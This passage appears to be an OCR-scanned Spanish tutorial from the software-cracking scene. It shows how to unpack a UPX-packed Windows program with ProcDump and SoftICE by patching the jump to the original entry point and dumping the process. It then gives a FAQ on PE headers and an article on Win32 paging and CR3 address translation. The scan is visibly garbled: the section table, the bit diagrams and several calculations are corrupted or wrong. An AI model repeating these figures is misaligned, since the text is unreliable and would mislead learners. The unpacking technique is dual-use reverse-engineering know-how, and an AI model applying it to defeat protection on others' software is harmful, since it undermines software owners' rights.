De 1 ya podemos deducir que el archivo está encriptado o empaquetado. Cuando generamos la lista muerta, lo que 
conseguimos es el código empaquetado. Para ejecutar el programa, el sistema debe montarlo en RAM, entonces debe 
desempaquetarlo primero. Esta es la importancia de los cargadores (LOADERS), desempaquetan los archivos y 
despliegan su contenido desempaquetado en memoria. Una vez hecho esto, podemos ver su verdadero contenido, incluso 
hasta volcarlo (dumping) a un archivo en disco duro. Esto explica la diferencia entre la lista muerta y el despliegue de 
SICE. 


El punto 2 apoya nuestra primera conclusión. El programa inicia no en su primera instrucción sino en otra, inicia en el 
código que va desempaquetando el programa original. 


El punto 3 es interesante ya que comienza a mostrarnos la importancia de conocer sobre los encabezados PE. Los 
nombres de las secciones, aunque no son los predefinidos, comienzan todos por el mismo prefijo: UPX. Si el archivo está 
empacado, el empacador utilizado cambia el nombre a las secciones y les asigna nuevos que inician con UPX. Veremos 
que con este dato es suficiente para desempacar SNIPPETCREATOR con PROCDUMP. 


El punto 4 nos dice que la sección con las instrucciones ejecutables del programa no tiene asignado los atributos 
correctos. Esto lo veremos luego. 


Nuestro análisis del punto 3 nos permite que ya procedamos a desempaquetar nuestra víctima. Pulsemos el botón 
"UNPACK" de PROCDUMP. En la caja de diálogo "Choose Unpacker" vemos una lista de desempacadores. 
Naveguemos por la lista. Aún sin saber mucho de desempacadores damos de inmediato con el desempacador correcto: 
UPX. Doble click sobre él, escogemos SNIPPETCREATOR, lo desempacamos y lo guardamos en disco duro. 


Ahora abramos el archivo desempaquetado con el PE Editor de PROCDUMP. ¡WAO!: ha cambiado el valor del punto 
de entrada, ahora es 00001000h, el convencional. Ahora echemos un vistazo en "Sections". ¡DE NUEVO WAO!: Ahora 
tenemos cuatro secciones. A las anteriores tres UPXs se agrega .idata, es decir, la sección con datos sobre nombres 
importados. 


También han cambiado las características (CHARACTERISTICS) y los desplazamientos virtuales (Virtual Offset) para 
las secciones. De esto hablaremos luego. 


Ahora hagamos una lista muerta del archivo desempacado. Con WDASM aparecen las llamadas a APIs aunque por 
ordinales. Con IDA PRO sí aparecen las llamadas a las APIs por nombre. El archivo ha sido desempaquetado. Ahora 
podemos sentarnos cómodamente a analizarlo y aprender como se hace un buen editor de archivos PE. 


En realidad no necesitamos PROCDUMP para hacer el desempaquetado. Sólo necesitamos hacer un volcado del 
encabezado PE y ver los nombres de las secciones para identificar el desempaquetador. También, conociendo el formato 
del encabezado, es suficiente abrir el archivo con un buen editor hexadecimal y buscar "manualmente" el encabezado de 
tablas de secciones y veremos los nombres incriminadores que revelan el empacador empleado. 


A propósito, podemos encontrar UPX en http://www.nexus.hu/upx/. Es freeware. Para el momento en que escribo esto, la 
versión disponible es la v0.84. Si comparamos la diferencia de tamaño entre el ejecutable empaquetado y el 
desempaquetado, nos daremos cuenta de la calidad de este empaquetador. No desempaca paquetes de versiones 
anteriores, así que no sirve para desempacar SNIPPETCREATOR v1.05. 


Ahora hasta podemos renombrar las secciones con los nombres predefinidos correspondientes, si quisieramos. Esto 
puede ser útil en ciertas ocasiones que por ahora no pienso mencionar. 


Ahora, supongamos que no tenemos a la mano el desempaquetador preciso, ni tampoco lo suministra PROCDUMP. 
Entonces podemos recurrir a otro método, el descrito por Volatily en su artículo Manually Unpacking - ASPack 
v1.083, que se puede conseguir en el inmeso WEB site de fravia. Es un método un tanto engorroso, pero funciona. Lo 


único es que no desempaca la sección .idata, entonces cuando lo desensamblamos no aparecen los nombres de las 
funciones API W32 en sus llamadas. 


Resumo los pasos de este procedimiento para desempacar manualmente un archivo ejecutable: 


1. Abrimos la víctima (SNIPPETCREATOR) con el PE Editor de PROCDUMP. 
2. Anotamos el punto de entrada (Entry Point): 00018037h 

3. En el editor de estructuras (Structures Editor) pulso "Sections". 

4. Anotamos los datos de la ventana Sections Editor: 


Sections Informations : 


Name | VitualSize_ [VitualOftset_ | RiawSize__ | RawoOltset 


00016000 00001000 0000000 00000400 E0000040 
DODODE50 00017000 00001000 00000400 C0000040 
UP2 00005029 00018000 00005029 00001400 E0000020 


5. Buscamos una sección ejecutable con la bandera de datos inicializados. 
Es la sección UPXO: 


000000040h datos inicializados. 
200000000h ejecutable. 

400000000h se puede leer. 

800000000h se puede escribir en la sección. 


E00000040h 


7. Para que el programa pueda ser desplegado por SICE al iniciar, cambiamos las características de la sección UPXO para 
hacerla una sección de código: reemplazamos E00000040h por E00000020h. Para hacer esto pulsamos sobre el nombre 
de la sección con el botón derecho del ratón y elegimos Edit Section del menú despegado. Se despliega ahora la caja de 
diálogo Modify section value. Reemplazamos el valor en el campo "Section Characteristics". Ahora podemos desplegar 
el ejecutable con el LOADER de SICE y desplegarlos en la pantalla del depurador. Anotamos también el desplazamiento 
(Virtual Offset) de esta sección: 1000h. Seguramente será la dirección donde inicia el programa original. 


8. Cargamos la víctima con SICE. Bajamos por el código del programa empleando la tecla F10, teniendo cuidado de 
colocar puntos de ruptura (BREACKPOINTS) o trampas en las instrucciones inmediatamente después de aquellas donde 
hay saltos hacia arriba. Por ejemplo: 

en la instrucción 0041806F hay un salto hacia arriba: JB 00418060, lo que indica que se trata de un bucle de miles 
vueltas. Entonces hacemos establecemos una trampa en la instrucción siguiente: BPX 00418073, y tecleamos FS para 
pasar por alto este bucle. Este procedimiento debe repetirse para cada bucle encontrado, si no queremos tardar años. 


9. En cualquier momento llegaremos a las instrucciones: 


004181CA 61 POPPAD 
004181CB E9308EfEFF  JMP 00401000 


Es un salto a la dirección 00401000h, que es el desplazamiento donde suponemos que inicia el código original del 
programa. Basamos esta suposición en el hecho de que esta es la dirección que generalmente establece por defecto el 
enlazador como punto de entrada. también en el hecho de que una de las secciones, seguramente la de código (.text) 
inicia aquí. Para asegurarnos que este es el caso, hacemos BPX 004181CB y seguimos (F10). Cuando arribamos a la 
dirección 00401000h ya podemos ver llamadas a funciones W32 API. Quiere decir que estamos en la sección de código. 


10. FS para salir de SICE. Cerramos la víctima y la corremos de nuevo. Seguramente se desplegará SICE en algunos de 
los BREAKPOINTS que dejamos cuando saltábamos bucles grandes.Debemos pulsar ES hasta llegar a 004181CB. 


11. Cuando llegamos aquí, cambiamos la instrucción: 
004181CB E9308EfEFF JMP 00401000 


por: 
004181CB E9308EfEFF — JMP004181CB 


Lo hacemos así: 
a 004181CB ¡mp 004181CB 


12. FS para volver a Win. El programa se ha quedado en un bucle infinito en la memoria. Abrimos PROCDUMP. 
Buscamos en la ventana de tareas (Tasks) de PROCDUMP a la víctima. Pulsamos sobre ella con el botón derecho del 
ratón. Elegimos "Dump (Full)" en el menú desplegado y guardamos el archivo desempacado en disco. 


13. Matamos la tarea víctima. 


14. Cambiamos el punto de entrada: abrimos el archivo desplegado con el PE Editor de PROCDUMP, y reemplazamos el 
valor en Entry Point por 00001000. 


15. Abrimos el archivo ya desempaquetado. Perfecto: funciona. Como vemos su tamaño se ha incrementado una 
barbaridad, lo que indica la potencia del empaquetador UPX. 


Si desensamblamos este desempaquetado con WDASM o con IDA, veremos los problemas de este método de 
desempaquetado: no se desempaqueta la sección de importaciones .idata, por lo tanto, no se despliegan los nombres de 
las funciones W32 API. 


Los primeros bytes del archivo... ¿Corresponden siempre y únicamente a la cabecera? 


Imagino que sí. El encabezado puede diividirse en cuatro grandes partes. La primera es el viejo encabezado DOS. El 
último campo de este encabezado apunta a un campo con un par de caracteres que dicen el formato del archivo 
ejecutable. Ahora, imaginate que este encabezado no esté aquí. El cargador no podría encontrar el encabezado PE ni 
tampoco podría determinar si se trata de un archivo PE (W32) o NE (W16) o LE (052). Hay algunas direcciones que 
varían pero cuando esto ocurre, algún campo del encabezado especifica dónde han sido relocalizados los datos. 


El encabezado es una estructura de datos por la cual el cargador de W32 siempre se orienta para acelerar la carga del 
ejecutable en vez de implementar algún algorritmo inteligente de búsqueda que impicaría un mayor costo en cuanto 
tiempo y trabajo de programación. 


¿Cuantos bytes tiene la cabecera? 


Respecto al tamaño, hay un campo que especifica este valor y se llama SizeOfHeaders y está en el encabezado PE 
(estructura _IMAGE_FILE_HEADER). El valor varía de acuerdo al número de secciones u objetos del PE. 


El valor decimal de "size of image'' en ProcDump no corresponde al tamaño real del fichero. ¿Por qué? 


Esto es consecuencia de los alineamientos. Realmente este campo indica la cantidad de espacio que se reserva en el 
espacio de direcciones para cargar el ejecutable. Una cosa es la memoria virtual reservada y otra la memoria física 
comprometida. Yo puedo reservar 10 MB e ir comprometiendo bloques de 300 KB según la necesidad que tenga de ello. 
Evidentemente, la memoria reservada deberá ser igual o mayor al tamaño de la imagen. El valor de "size of image"que 
vemos, por ejemplo, en ProcDump depende del valor "SectionAlignement", es decir, del alineamiento de las secciones. 
Es uno de los campos opcionales de la estructura _IMAGE_FILE_HEADER. 


Una página mide 4096 bytes. Si un PE tiene 3 secciones, todas de un tamaño menor a 4096 bytes, y si estas, de acuerdo a 
SectionAlignement" están alineadas en límites de 65.536 bytes, el tamaño de la imagen será 3 * 65.356 = 196.608 bytes. 


Si yo estoy creando el programa puedo controlar el valor de "size of image" variando "SectionAlignement" en las 
opciones del enlazador (de TLINK o de LINK), pero esto no es necesario, porque el mismo enlazador determina el valor 
de "SectionAlignement" a partir del tamaño de cada sección. 


Si la mayoría de los ejecutables tienen la misma dirección base 00400000h ¿como pueden proyectarse varios 
ejecutables a la vez? ¿Qué pasa cuando dos ejecutables tienen igual la: direccionbase + puntoentrada? 


Esto se aclara viendo cómo W32 convierte direcciones virtuales en direcciones reales. Es una cuestión crucial en SOs 


multiprocesos. W32 es uno de estos SOs, también UNIX y LINUX. Para no enredar mucho las cosas, se puede decir que 
W32 crea en memoria física una tabla para cada proceso en ejecución. Esta tabla contiene direcciones de entradas de otra 
tabla que son punteros hacia las direcciones en memoria real donde se encuentran las instrucciones o los datos cargados 
en la RAM. La dirección física de la primera entrada de la tabla que transforma direcciones virtuales en reales está en un 
registro del CPU llamado CR3 (CONTROL REGISTER 3). Para cualquier aplicación puedes obtener el valor en este 
registro empleando SICE simplemente con el comando CPU, el cual muestra el valor en los diferentes registros del CPU. 
Hay que tener en cuenta que el valor de CR3 es sólo la dirección física de la primera entrada de una tabla de punteros a 
direcciones físicas de otra tabla. Se requiere todavía tener el número de la entrada de esta primera tabla para saber donde 
está en la memoria física la segunda tabla. 


Fíjate que casi todas las direcciones virtuales de una aplicación comienzan con 0040XXXXh. No voy a explicarlo, pero 
esto indica la primera entrada de la tabla apuntada por CR3. Lo cierto es que cada tabla primaria es también una página 
de 4096 bytes, dividida en 1024 entradas de 32 bytes que son punteros a la base de otra tabla en memoria física. 


Ahora, ¿por qué un ejecutable en memoria no interrumpe a otro, aunque tengan las mismas bases virtuales? Las posibles 
respuestas a esta pregunta me parece que ya se tienen de alguna manera. La dirección real o física de la página de 
directorio activa se almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre 
procesos. Para cada proceso, el sistema crea un directorio de página particular. Para procesos distintos no deben coincidir 
los directorios de página, de lo contrario se producirá un error de protección, como a veces ocurre. 


¿Qué utilidad tiene dividir los ejecutables en secciones? 


Para facilitar la ubicación de los datos. Además porque, como expliqué, cada sección tiene diferente función y diferentes 
atributos. Imagina el enrredo si el enlazador al crear el programa pusiera el código junto a los datos, mezclados con los 
recursos y otras cosas: uff! Esto es así siempre, incluso en DOS. Lo que pasa es que en DOS se segmenta la memoria; 
W32 la pagina. También podemos encontrar otras razones que exigirían el manejo de conceptos que finalmente terminan 
enrredándonos más y haciéndonos parecer que se trata de una cosa muy compleja. Se trata de explicaciones que podemos 
encontrar en libros sobre arquitectura de computadoras. Hay varios en español, posiblemente en alguna biblioteca. 


W32 puede manejar 4 Gb ffff:ffffffff que vemos en el sice. FFFFh x FFFFFFFFh = FFFF0001h = 4294901761 
bytes = 4 Gb Lo cual quiere decir que las direcciones que siempre vemos en sice no son de la ram sino de la 
memoria virtual ¿no? 


Muy cierto. Esto creo que cambiará el día que ya no necesitemos memoria virtual. De todos modos, si se tiene suficiente 
cantidad de RAM, en ocasiones podemos prescindir de ella. Yo nunca he probado, pero me han comentado que es más 
rápido. 


Las paginas de memoria parecen importantes ¿qué son? ¿Qué relación tienen con las direcciones que vemos en 
SICE? 


W32 divide la memoria física en "páginas" que tiene una longitud de 4096 bytes (4 KB). Una máquina con 8 MB de 
memoria tiene 2048 páginas. W32 mantiene una colección de tablas de página (también de 4 KB) para traducir 
direcciones virtuales a direcciones físicas. Cada proceso tiene su propia "página de directorio": una colección de hasta 
1024 entradas de 32 bits almacenadas contiguamente. La dirección real o física de la página de directorio activa se 
almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre procesos. Por eso, las 
direcciones virtuales iguales entre dos procesos diferentes no apuntan a la misma dirección física, a no ser que refieran a 
espacios de memoria compartidos. 


Las direcciones que despliega SICE son virtuales y a partir de ellas se puede determinar la dirección de memoria física 
donde están los datos o instrucciones correspondientes. Para ello se puede emplear el comando PHYS, que busca la tabla 
de páginas y el Directorio de páginas asociado con el contexto de direcciones actual desplegado por SICE. Es decir, 
PHYS despliega todas las direcciones virtuales para direcciones físicas. Puede emplearse PEEK para leer desde la 
memoria física, ya que muestra el byte, word, o dword en una dirección física dada. PEEK es útil para leer registros de 
entrada o salida proyectados en memoria. También es útil el comando PAGE, el cual permite ver la proyección de todo el 
rango de direcciones lineales. Esto permite obtener la dirección física del directorio de página y verificar si las tablas de 
páginas del sistema operativo están proyectadas en la dirección lineal 0xC0000000. Véase La Memoria en W32: intro. 


¿Por qué necesitamos alineamientos? ¿ Por qué FileAligment usualmente usa límites en 512 bytes y 
SectionAlignment (después de que la imagen fue cargada en RAM) usualmente usa límites de 4096 bytes? 


W32 trata con paginación de memoria física y usa memoria virtual. Entonces W32 tiene que manejar memoria virtual y 
debe tener una manera rápida de encontrar los datos del archivo. Estas son las razones de la existencia del encabezado 


PE. 


W32 pagina la memoria física, la divide en regiones de tamaño fijo. En la arquitectura x86 cada página tiene un tamaño 
de 4096 bytes. Cualquier sección cargada en RAM debe tener un alineamiento para soportar paginación de memoria. 
Cuando el sistema reserva memoria, asegura que la región reservada sea un múltiplo par del tamaño de página. 
SectionAlignment garantiza que cada sección comience en una dirección virtual alineada a una página 


File Alignment es un valor que debe ser potencia de 2 entre 512 y 65,535. Es "la granularidad mínima de pedazos 
(chunks) de información dentro de la imagen antes de ser cargada" [Katz]. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (el cual también 
tiene un tamaño de 512). 


¿Qué es un proceso? 


W32 llama proceso a un programa en ejecución. Un proceso posee un espacio de 4 GB con los datos y el código del 
archivo EXE de la aplicación. Un proceso es inerte, no hace nada. Para que haga algo debe poseer un hilo, el cual se 
responsabiliza de ejecutar el código presente en el espacio de direcciones del proceso. Incluso, un proceso puede tener 
más de un hilo en el mismo espacio de direcciones ejecutándose al mismo tiempo. Pero el proceso necesita por lo menos 
un hilo para ejecutar el código proyectado en su espacio de direcciones, en caso contrario el sistema destruye el proceso 
y su espacio de direcciones. 


¿Qué es un hilo (thread)? 


Es la descripción de la trayectoria que sigue la ejecución de un proceso. Cuando arranca un proceso, el sistema crea un 
hilo principal (llamando a CreateThread) el cual comienza llamando a la función WinMain, ejecutándola hasta alcanzar 
la función ExitProcess que culmina el proceso. La noción de hilo fue implementada por W32 para dar cuenta de la 
posiblidad de los procesos W32 de correr más de un subproceso al mismo tiempo. W32 llama hilos a los subprocesos. 


Bueno. Lo visto hasta ahora puede servir como una introducción al conocimiento de los archivos con formato PE y para 
adquirir cierta conciencia de la importancia de este asunto. Realmente deberíamos profundizar más. 


Como vieron he escogido como víctima a SNIPPETCREATOR. No es casual. Se trata de un programa muy poderoso, 
pero que requiere conocimiento de programación en ASM W32 y conocer el formato PE. Si tienes a la mano MASM 6.X 
o TASM 5.X, entonces podemos avanzar ya al estudio de SNIPPETCREATOR, lo cual nos dará mayor conocimiento 
sobre los archivos PE: 


snippetcreator: tutorial (en elaboración) 


Si no tienes conocimiento del lenguaje ensamblador para W32, pero todavía te interesa el tema de los PE, entonces 
pasemos a estudiar la sección de recursos de estos archivos. 
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La Memoria en W32: intro 
Introducción 


La gestión de memoria en W32 se realiza a través de tres mecanismos: 


1- memoria virtual: cuando se quiere gestionar grandes estructuras de objetos. 

2- proyección de archivos en memoria: para gestionar grandes paquetes de datos en los archivos 
y compartir datos entre procesos distintos. 

3- montículos (heaps): para gestionar muchos bloques pequeños de datos. 


El tema está suficientemente desarrollado en tres artículos clásicos de Randy Katz: 


1- Managing Virtual Memory in Win32 
2- Managing Memory-Mapped Files in Win32 
3- Managing Heap Memory in Win32 


En este artículo me limitaré a explicar un poco la gestión de la memoria virtual en W32, concetrándome en la 
manera cómo W32 traduce direcciones virtuales a direcciones reales. Se trata de una adpatación de la sección 
"Finalmente, 32 bits" del capítulo "Gestión de memoria y entrada/salida de archivos" del libro Programación en 
Windows 95 de Charles Petzold. 


Al Atake 


¿QUÉ ES MEMORIA VIRTUAL? 


A medida que los programas de aplicación se han hecho más sofisticados y más grandes, se ha necesitado de 
ampliar las posibilidades de la memoria dinámica de los sistemas. Debido a lo poco económico que resulta atender 
la gran exigencia de memoria simplemente implementando ships con elevada capacidad de almacenamiento, este 
problema se ha abordado vía software, a través de sistemas operativos que ofrecen gestión de memoria virtual. 


Es un mecanismo de gestión de la memoria de un sistema que implementa un espacio de memoria ficticio, llamado 
espacio de direcciones o de nombres, el cual es mucho mayor que el espacio de memoria real física que posee el 
hardware del sistema. De esta manera, el programador al desarrollar aplicaciones para un SO con memoria virtual, 
no tiene que ocuparse de la memoria física, simplemente programa como si tuviera a su disposición una gran 
espacio de direcciones para cada proceso. 


¿CÓMO ES POSIBLE LA GESTIÓN DE MEMORIA VIRTUAL? 


El programador desarrolla sobre un gran espacio de memoria virtual, compila o ensambla sus fuentes para producir 
los ejecutables de sus aplicaciones. Es todo lo que hace. El SO se encarga de lo demás: traduce las direcciones 
virtuales en direcciones físicas y carga en la RAM del sistema sólo aquellos bloques de la aplicación que necesi ta, 
nunca carga todo el ejecutable ya que éste seguramente ocuparía todo el espacio de memoria física disponible y el 
sistema colapsaría. 


¿CÓMO TRADUCE W32 DIRECCIONES VIRTUALES A REALES? 


W32 requiere la presencia de un microprocesador Intel 386, 486 o Pentium. Estos procesadores usan 
direccionamiento de memoria de 32 bits y por tanto son capaces de acceder 2 elevado a la 32, es decir, 
4.294.967.296 bytes (4 gigabytes o GB) de memoria física. Por supuesto, la mayoría de los usuarios de W32 no 
están cerca de ese límite. 


Las direcciones de 32 bits usadas por los programas W32 para acceder al código y los datos no son las direcciones 
físicas de 32 bits que el microprocesador usa para direccionar la memoria física. La dirección que utiliza la 
aplicación se llama dirección «virtual» la cual es una dirección ficticia que se traduce a una dirección física a través 
de una «tabla de página». 


Para leer una instrucción o dato en la RAM, el CPU necesita colocar en el BUS de direcciones esa dirección donde 
debe estar ubicada la dirección o dato solicitado. Por ejemplo, si quiere acceder a la memoria de video, que está en 
0A0000h, el CPU debe colocar este valor en el BUS. 


Como las direciones de las aplicaciones son direcciones virtuales, el CPU debe traducirlas a direcciones físicas 
antes de acceder a los datos en la RAM. 


Las aplicaciones suelen ignorar este proceso. El programa parece almacenarse en un espacio de direcciones de 32 
bits y no hay nada extraño cuando se tiene que acceder a esta memoria. Sin embargo, es conveniente hacerse una 
idea de lo que significa esto. 


W32 pagina la memoria física, la divide en «páginas» con una longitud de 4096 bytes (4 KB). Una máquina 
equipada con 8 megabytes de memoria tiene 2048 páginas. W95/98 mantiene una colección de tablas de página 
(ellas mismas páginas 4 KB) para traducir direcciones virtuales a direcciones físicas. 


Cualquier proceso en W32 tiene su propia «página de directorio», que es una colección de hasta 1024 entradas de 
32 bits almacenadas contiguamente, una después de otra. La dirección física de la página de directorio activa se 
almacena en un registro del microprocesador llamado CR3 (CONTROL REGISTER 3), que se cambia cuando el 
SO conmuta el control entre procesos. Los 10 bits altos de una dirección virtual especifican una de las 1024 
entradas posibles en esta página de directorio. Los 20 bits altos de la entrada de la página de directorio indica una 
dirección física de una tabla de página (los 12 bits inferiores de la dirección física se definen a cero). Esto 
referencia otra página, que también tiene hasta 1024 entradas de 32 bits. Los 10 bits del medio de la dirección 
virtual referencian una de estas entradas. De nuevo, la entrada tiene una dirección física de 20 bits para indicar la 
posición de comienzo de un marco de página, que es una dirección física. Los 12 bits inferiores de una dirección 
virtual apuntan a una posición física dentro de este marco de página. 


Mostrado simbólicamente, uno puede representar una dirección virtual de 32 bits (que es con lo que trabaja una 
aplicación) como una entrada de página de directorio de 10 bits (d), una entrada de tabla de página de 10 bits (p) y 
un offset de 12 bits: 


dddd-dddd-ddpp-pppp-pppp-0000-0000-0000 


Para cada proceso, el microprocesador almacena un valor de 20 bits en el registro CR3 (1 de registro): 


TErC-CECE-PErr-Errr-rrrr 


La dirección física de comienzo de la página de directorio activa del proceso es: 


rrrr-rrrr-rrrr-rrrr-rrrr- 0000-0000-0000 


Recuérdese que todas las páginas se almacenan en límites de 4 KB, por tanto, cada página comienza en una 
dirección con los 12 bits inferiores igual a cero. El microprocesador primero accede a la dirección física: 


rrrr-rrrr-rrrr-rrrr-rrrr-dddd-dddd-dd00 


Esta posición contiene otro valor de 20 bits (t de tabla): 


tttt-tttt-tttt-tttt-cttt 


lo cual indica la dirección física de comienzo de una tabla de página: 


tttt-tttt-tert-tett-tttt-0000-0000-0000 


El microprocesador accede luego a una dirección física: 


tttt-tttt-tttt-tttt-tttt-pppp-pppp-pp00 


Almacenado en este área hay un valor de 20 bits de un marco de página (c de marco): 


CCCC-ECCC-CCCC-ECCC-ECCCC 


La dirección fisíca final de 32 bits es una combinación de este marco de página con los 12 bits de offset inferiores 
de la dirección virtual: 


CCCC-ECCC-EcCCeCe-ECCce-ecCCcc-0000-0000-0000 


Esta es la dirección física. Es todo. 


Puede parecer que traducir una dirección virtual en dirección física es un proceso que lleva mucho tiempo, pero 
realmente no es así. Los microprocesadores Intel 386, 486 y Pentium tienen una memoria cache interna que puede 
guardar estas tablas de página dentro del microprocesador. La traducción se realiza de forma muy rápida sin 
ninguna penalización de tiempo. Esta doble paginación (páginas que se guardan en una página) ofrece a cada 
aplicación un límite teórico de aproximadamente un millón de páginas de 4 KB. 


EMPLEANDO SICE 


Podemos revisar el proceso de traducción de memoria virtual a memoria física con SICE. 


Carguemos notepad.exe con el loader de SICE. Cuando se despliega la pantalla de SICE, el depurador está 
apuntando a la primera instrucción del programa cuya dirección virtual es 00401000h. A partir de esta dirección 
podemos calcular la dirección física donde se ubica esta instrucción en la RAM. 


Traduzcamos el valor hexadecimal de la dirección virtual a binario: 


0000 0000 0100 0000 0001 0000 0000 0000 


Tenemos: 
1. Entrada del directorio de páginas o primario, diez bytes altos: 


0000 0000 01 = 1 
Es la entrada 1 del directorio primario 


2. Entrada de la tabla de páinas o directorio secundario, diez bytes medios: 


00 0000 0001 = 1 
Es la entrada 1 del directorio secundario 


3. Desplazamiento en el marco de página de memoria física, doce bytes bajos restantes: 


0000 0000 0000 = 0 


Comienzo del marco de página o desplazamiento cero. Recuérdese que es la primera instrucción del programa. 
Para determinar exactamente la dirección física de la dirección debemos: 


1. obtener la dirección física donde está el directorio de páginas activas o directorio primario. Este valor está en 
CR3 y lo obtenemos con el comando 'CPU' de SICE. Cada entrada de este directorio es un puntero al directorio 
secundario. 


2. obtener la dirección de la entrada en el directorio primario donde se encuentra la dirección del comienzo del 
directorio secundario. Sabemos la dirección del inicio del directorio primario por los 20 bits altos del contenido de 
CR3. La entrada dentro del directorio primario que dice donde está la tabla que interesa está indicada por los diez 
bits altos de la dirección virtual. Como cada entrada del directorio primario es de 32 bits = 4 bytes, hay que 
multiplicar el número de entrada por 4 para obtener la dirección de la entrada correspondiente en el directorio 
primario. 


3. obtener la dirección física dónde se encuentra la tabla de páginas o directorio secundario. Con la dirección de la 
entrada del directorio de página donde está la dirección de la tabla de páginas activas, se puede emplear el comando 
PEEK de SICE para obtener esta última dirección: 


PEEK D DIRECCIÓN_DE_ENTRADA_DE_DIRECTORIO_PRIMARIO 


4. obtener la dirección de la entrada en la tabla de páginas donde está la dirección del inicio o marco de la página 
donde está la instrucción apuntada por la dirección virtual. Sabemos la dirección del inicio del directorio secundario 
por los 20 bits altos del contenido la entrada del directorio primario. La entrada dentro del directorio primario que 
dice donde está el mmraco de página que buscamos está indicada por los diez bits medios de la dirección virtual. 
Como cada entrada del directorio secundario es de 32 bits=4 bytes, hay que multiplicar el número de entrada por 4 
para obtener la dirección de la entrada correspondiente en el directorio secundario. 


5. obtener la dirección física dónde se encuentra el marco de página donde se ubica la instrucción señalada por la 
dirección virtual. Con la dirección de la entrada del directorio secundario donde está la dirección del marco de 
páginas, se puede emplear el comando PEEK de SICE para obtener esta última dirección, ya que este comando 
devuelve el contenido de una dirección física: 


PEEK D DIRECCIÓN _DE_ENTRADA_DE_DIRECTORIO_SECUNDARIO 


6. obtener la dirección física de la instrucción en la página específica. Este valor se obtiene a partir de los 20 bits 
altos del contenido en la entrada correspondiente en el directorio secundario y los 12 bits bajos en la dirección 
virtual. Estos bits bajos de la dirección virtual son un desplazamiento dentro del marco de página donde se ubicó el 
contenido de la aplicación. 


7. obtener el contenido en la dirección física señalada por el desplazamiento dentro del marco de página donde se 
encuentra el código o los datos indicados por la dirección virtual. Finalmente el comando 


PEEK D DESPLAZAMIENTO_EN_MARCO_DE_PÁGINA 


devuelve, invertida, la instrucción en octal en la dirección virtual. Para comprobar esto, si el puntero de SICE 
apunta a esta dirección virtual el comando 


D EIP 


devuelve el mismo valor en la ventana de datos de SICE. También podemos verificar esto revisando el código en 
octal de la instrucción correspondiente. Debemos ver lo mismo pero invertido. El comando 


CODE ON 
lo mostrará. 
Contiínuemos con notepad.exe. 
Ya tenemos los valores que corresponden a la dirección virtual de la primera instrucción de notepad.exe 


La dirección física de la página de directorio o directorio primario lo obtenemos con el comando CPU de SICE: 
008170000h. Traduzcámoslo a binario: 


0000 0000 1000 0001 0111 0000 0000 0000 


Los primeros 20 bits de este número indican la dirección física del comienzo del directorio primario del proceso 
activo. Los diez bits altos de la dirección virtual nos dicen que se trata de la primera entrada en este directorio 


0000 0000 1000 0001 0111 - 0000 0000 01 - 00 


A A 


bytes altos en CR3 - — bytes altos 
en dir virtual 


obtenemos una nueva dirección física, la de la entrada 1 de la tabla de pá- 
ginas o directorio secundario: 00817004h. 


Ejecutemos el comando PEEK D 817004. 


PEEK D 00817004 
SICE nos dá: 01EFE267 


Obtenemos ahora la dirección física del directorio secundario. En binario: 


0000 0001 1110 1111 1110 001001100111 


Los doce bits altos de este valor apuntan al inicio del directorio secundario. Los diez bits medios indican una 
entrada dentro de este directorio. 


1100 0001 1011 1011 1111 - 00 0000 0001 - 00 


A A 


bytes altos en 0IEFE267  - bytes medios 
en dir virtual 


En hexadecimal: 01EFF004H 


Esta entrada contiene la dirección del marco de página en memoria física donde se encuentra instrucción indicada 
por la dirección virtual. 


Ahora obtengamos la dirección del marco de página: 


PEEK D 01EFF004 
Obtenemos un valor como 01DEC225h. Traduzcamos este valor a binario: 
0000 0001 1101 1110 1100 0010 0010 1001 


Los 20 bits altos de este valor son la dirección física de un marco de página, es decir, del comienzo de una página 
de memoria física. Si agregamos a este valor el valor indicado por los doce bits bajos de la dirección virtual 
obtenemos la dirección física donde se haya la instrucción señalada por la dirección virtual: 


0000 0001 1101 1110 1100 - 0000 0000 0000 


A A 


bytes altos en 0IDEC225h  - bytes bajos 
en dir virtual 


PEEK D 01DEC0000 


SICE devuelve 83EC8B55 


El valor devuelto por este comando corresponde a la instrucción en octal, pero invertido, a la que apunta la 
dirección virtual. Si esta es la dirección señalada por el puntero de SICE el siguiente comando nos devolverá el 
mismo valor regeresado antes: 


D EIP 


Vemos ahora que la ventana de datos de SICE apunta a 83EC8B535, en la dirección EIP, el mismo valor devuelto 
con el comando 'PEEK D 01DEC0000' 


Hagamos "code on" y veamos la correspondencia entre el valor desplegado por el último PEEK y el código en octal 
desplegado por SICE, que seguramente será el mismo pero invertido 


55 push ebp 
SBCE mov ebp, esp 
83... 


¿QUÉ VENTAJAS TIENE LA PAGINACIÓN? 


Las ventajas de la paginación son: 


Primero, las aplicaciones se aislan unas de otras. Ningún proceso puede inadvertidamente (o maliciosamente) 
escribir encima del espacio de código o datos de otro proceso, pues ni siquiera es capaz de direccionar la memoria 
del otro proceso sin el valor CR3 adecuado, y definir este valor es una tarea que sólo puede hacer el núcleo W32. 


Segundo, este mecanismo de paginación resuelve uno de los problemas más básicos en un entorno multitarea: la 
consolidación de la memoria libre. En un esquema de direccionamiento más simple, a medida que se ejecutan 
múltiples programas y se sale de ellos, la memoria se va fragmentando. Si la memoria está demasiado fragmentada, 
los programas no se pueden ejecutar porque no tienen suficiente memoria contigua, incluso aunque la cantidad total 
de memoria libre sea la adecuada. Con la paginación, no es necesario consolidar la memoria física libre porque las 
páginas no tienen que ser contiguas. Cualquier cosa se gestiona manipulando las tablas de página. La única pérdida 
viene realmente por el espacio perdido en las propias tablas de página y la granularidad de las páginas de 4 KB. 


Tercero, hay bits extra en las entradas de tabla de página de 32 bits además de las direcciones de 20 bits. Un bit 
indica que se ha accedido a una página particular (se denomina bit de «acceso»); otro que la página ha sido escrita 
(el bit «sucio»). W32 puede usar estos bits para determinar si una página de memoria se puede intercambiar 
(swapping) a un archivo de disco para obtener más memoria física libre. Otro bit («presencia») indica si la página 
se ha intercambiado al disco y se tiene que recargar en memoria. 


Otro bit («lectura/escritura») indica si la página se puede escribir. Este bit protege el código de los punteros 
errantes. Por ejemplo, si se incluye la instrucción en código C siguiente en un programa Windows: 


* (int *) WinMain 0; 


